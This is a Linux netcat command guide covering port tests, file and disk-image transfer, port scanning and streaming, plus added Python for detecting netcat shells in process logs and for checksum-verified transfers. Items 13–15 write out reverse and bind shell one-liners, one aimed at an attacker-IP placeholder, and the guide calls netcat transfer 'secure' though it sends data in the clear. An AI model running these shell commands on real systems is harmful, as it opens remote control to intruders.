Netcat, often referred to as nc, is a powerful networking utility in Linux that allows users to manage network connections, transfer files, and perform network diagnostics. This guide will explore each of the netcat commands presented in the image, providing detailed explanations and examples.
Basic Network Operations
1. nc 10.0.0.10 80
Description: Test if the remote TCP port is open (use -u for UDP).
Example:
nc 10.0.0.10 80
This command attempts to connect to port 80 on the IP address 10.0.0.10. If the connection is successful, the port is open.
2. nc -l 1234
Description: Set up a TCP server listening on port 1234 (use -u for UDP).
Example:
nc -l 1234
This command sets up a TCP server that listens for incoming connections on port 1234.
3. nc -k -l 1234
Description: Keep netcat listener alive after the current connection dies.
Example:
nc -k -l 1234
This command keeps the netcat listener alive on port 1234, even after a connection is closed.
File Transfer
4. nc 10.0.0.10 1234 < my.tgz
Description: Transfer file to remote endpoint via netcat.
Example:
nc 10.0.0.10 1234 < my.tgz
This command sends the my.tgz file to the IP address 10.0.0.10 on port 1234.
5. cat my.tgz | nc 10.0.0.10 1234
Description: Transfer file to remote endpoint via netcat using cat.
Example:
cat my.tgz | nc 10.0.0.10 1234
This is another way to send the my.tgz file using a pipe.
6. nc -l 1234 > my.tgz
Description: Receive and save file via netcat.
Example:
nc -l 1234 > my.tgz
This command sets up a listener on port 1234 to receive a file and save it as my.tgz.
Advanced File Operations
7. tar -cf - . | nc -v 10.0.0.10 1234
Description: Create a tarball and pipe it to netcat.
Example:
tar -cf - . | nc -v 10.0.0.10 1234
This command creates a tarball of the current directory and sends it to 10.0.0.10 on port 1234.
8. nc -lv 1234 | tar -xvf -
Description: Receive a tarball and extract it in the current directory.
Example:
nc -lv 1234 | tar -xvf -
This command listens on port 1234, receives a tarball, and extracts it in the current directory.
Network Scanning
9. nc -z 10.0.0.10 1-1000
Description: Scan a range of ports for a target (e.g., 1 to 1000).
Example:
nc -z 10.0.0.10 1-1000
This command scans ports 1 through 1000 on the IP address 10.0.0.10 to see which ones are open.
10. nc -z 10.0.0.10 1-100 200-300
Description: Scan multiple ranges of ports.
Example:
nc -z 10.0.0.10 1-100 200-300
This command scans two ranges of ports, 1 to 100 and 200 to 300, on the IP address 10.0.0.10.
11. nc -vuz -w1 10.0.0.10 1-1000
Description: Scan a range of UDP ports with a 1-second timeout.
Example:
nc -vuz -w1 10.0.0.10 1-1000
This command scans UDP ports 1 to 1000 on 10.0.0.10, with a timeout of 1 second for each port.
HTTP Requests and Shells
12. printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80
Description: Send an HTTP request.
Example:
printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80
This command sends a basic HTTP GET request to google.com on port 80.
13. nc <attacker-ip> 4444 -e /bin/##
Description: Create a reverse shell on the target host.
Example:
nc <attacker-ip> 4444 -e /bin/##
This command sets up a reverse shell that connects to the attacker’s IP on port 4444.
14. nc -l 4444 -e /bin/##
Description: Create a bind shell on the target host.
Example:
nc -l 4444 -e /bin/##
This sets up a shell that listens for connections on port 4444.
15. nc -k -l 4444 -e /bin/##
Description: Create a persistent netcat listener for bind shell.
Example:
nc -k -l 4444 -e /bin/##
This command keeps the bind shell listener alive on port 4444.
16. nc -l 12345 -c 'uptime'
Description: Run a command and redirect output to client.
Example:
nc -l 12345 -c 'uptime'
This sets up a listener on port 12345 that runs the uptime command and sends the output to the connecting client.
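Commands 13 to 16 are what a defender most wants to recognise in process-execution telemetry: netcat started with -e, -c or ncat's --exec/--sh-exec, which attaches a program to the socket. This added example (not from the original page) classifies constructed sample log lines into reverse-shell and bind-shell findings; the log format is an assumption, and several binary names are matched because the exec options exist in ncat and traditional netcat but not in OpenBSD's nc.

```python
import re
import shlex

# Constructed process-execution log lines for illustration (not from any real host).
SAMPLE_LOGS = [
    'proc_exec user=www-data cmd="nc 203.0.113.5 4444 -e /bin/sh"',
    'proc_exec user=alice cmd="nc -l 1234 > my.tgz"',
    'proc_exec user=root cmd="nc -k -l 4444 -e /bin/bash"',
    'proc_exec user=bob cmd="ncat -lvp 12345 -c uptime"',
    'proc_exec user=alice cmd="nc -z 10.0.0.10 1-1000"',
    'proc_exec user=deploy cmd="tar -cf - . | nc -v 10.0.0.10 1234"',
]

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
EXEC_FLAGS = {"e", "c"}                       # -e/-c: attach a program to the socket
EXEC_LONG = {"--exec", "--sh-exec"}           # ncat long forms of the same thing

def classify_netcat(cmdline):
    """Return a finding for a netcat invocation that attaches a program, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    for i, word in enumerate(argv):
        if word.rsplit("/", 1)[-1] not in NETCAT_NAMES:
            continue                          # netcat may follow a pipe: "tar ... | nc ..."
        flags = set()
        for arg in argv[i + 1:]:
            if arg in ("|", ";", "&&"):
                break                         # stop at the end of this command
            if arg.split("=", 1)[0] in EXEC_LONG:
                flags.add("e")
            elif arg.startswith("-") and not arg.startswith("--"):
                flags.update(arg[1:])         # expand combined short flags such as -lvp
        if not flags & EXEC_FLAGS:
            continue
        kind = "bind shell" if "l" in flags else "reverse shell"
        if "k" in flags:
            kind += " (persistent, -k)"
        return {"kind": kind, "cmd": cmdline}
    return None

def scan_logs(lines):
    """Pull user and command out of each line; return findings in log order."""
    findings = []
    for line in lines:
        m = re.search(r'user=(\S+) cmd="([^"]*)"', line)
        if m and (finding := classify_netcat(m.group(2))):
            finding["user"] = m.group(1)
            findings.append(finding)
    return findings
```

Plain transfers (commands 4 to 8) and the port scan (command 9) produce no finding, so the rule stays quiet on routine administrative use.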
Disk and Data Management
17. dd if=/dev/sdb | gzip -c | nc 10.0.0.10 1234
Description: Transfer a gzipped hard drive out.
Example:
dd if=/dev/sdb | gzip -c | nc 10.0.0.10 1234
This command reads from /dev/sdb, compresses it with gzip, and sends it to 10.0.0.10 on port 1234.
18. nc -l 1234 | sudo dd of=/backup/sdb.img.gz
Description: Save transferred hard drive image.
Example:
nc -l 1234 | sudo dd of=/backup/sdb.img.gz
This command listens on port 1234 and writes the received data to /backup/sdb.img.gz.
Web and Streaming
19. while true; do nc -l 8000 < test.html; done
Description: Serve a static web page.
Example:
while true; do nc -l 8000 < test.html; done
This loop acts as a bare-bones web server: each client that connects to port 8000 receives the raw contents of test.html (netcat adds no HTTP status line or headers), and after the client disconnects the loop starts a fresh listener for the next one.
20. mkfifo /tmp/pipe; cat video.mp4 > /tmp/pipe & nc -ul 12345 < /tmp/pipe
Description: Start streaming the video upon client connection.
Example:
mkfifo /tmp/pipe; cat video.mp4 > /tmp/pipe & nc -ul 12345 < /tmp/pipe
This command streams video.mp4 over UDP on port 12345. /tmp/pipe must be a named pipe (FIFO) created with mkfifo, not a directory: cat feeds the file into the FIFO in the background, and nc starts sending its contents once the first client datagram arrives on port 12345.
21. nc -u 10.0.0.10 12345 | mplayer -
Description: Receive and play video stream with mplayer.
Example:
nc -u 10.0.0.10 12345 | mplayer -
This command receives a video stream from 10.0.0.10 on port 12345 and plays it using mplayer.
Detailed Examples and Use Cases
File Transfer
For secure and fast file transfer between two systems, use netcat. Here is how you can send a tarball of a directory:
Sender:
tar -cf - . | nc -v 10.0.0.10 1234
Receiver:
nc -lv 1234 | tar -xvf -
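Neither this sender/receiver pair nor commands 4 to 8 verifies what arrived: netcat streams bytes in the clear with no authentication and stops at EOF, so a truncated transfer looks exactly like a complete one. This added example (not from the original page) reproduces the two ends in Python over loopback and compares SHA-256 digests on both sides, which is the same check as running sha256sum on the file at each end; the port is chosen by the OS instead of the fixed 1234, and the payload is constructed rather than a real tarball.

```python
import hashlib
import os
import socket
import tempfile
import threading

def receive_file(listener, dest_path):
    """Netcat-style receiver (nc -l PORT > file): accept one client, write until EOF."""
    conn, _ = listener.accept()
    digest = hashlib.sha256()
    with conn, open(dest_path, "wb") as out:
        while chunk := conn.recv(65536):
            out.write(chunk)
            digest.update(chunk)
    return digest.hexdigest()

def send_file(host, port, src_path):
    """Netcat-style sender (nc HOST PORT < file): stream the file, then close to signal EOF."""
    digest = hashlib.sha256()
    with socket.create_connection((host, port)) as conn, open(src_path, "rb") as src:
        while chunk := src.read(65536):
            conn.sendall(chunk)
            digest.update(chunk)
    return digest.hexdigest()

def verified_transfer(src_path, dest_path):
    """Run both ends over loopback; return (digests_match, sha256_hex_of_sent_data)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))          # OS-chosen port instead of a fixed 1234
    listener.listen(1)
    port = listener.getsockname()[1]
    received = {}
    rx = threading.Thread(target=lambda: received.update(sha=receive_file(listener, dest_path)))
    rx.start()
    sent_sha = send_file("127.0.0.1", port, src_path)
    rx.join()
    listener.close()
    return sent_sha == received["sha"], sent_sha

def demo():
    """Constructed 1 MiB payload (not a real tarball); returns (digests_match, bytes_identical)."""
    workdir = tempfile.mkdtemp()
    src, dst = os.path.join(workdir, "my.tgz"), os.path.join(workdir, "received.tgz")
    payload = bytes(range(256)) * 4096
    with open(src, "wb") as f:
        f.write(payload)
    ok, _ = verified_transfer(src, dst)
    with open(dst, "rb") as f:
        return ok, f.read() == payload
```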
Port Scanning
Netcat can be used to scan open ports on a remote system, useful for security assessments.
Scan TCP ports 1-1000:
nc -z 10.0.0.10 1-1000
Scan UDP ports 1-1000 with a 1-second timeout:
nc -vuz -w1 10.0.0.10 1-1000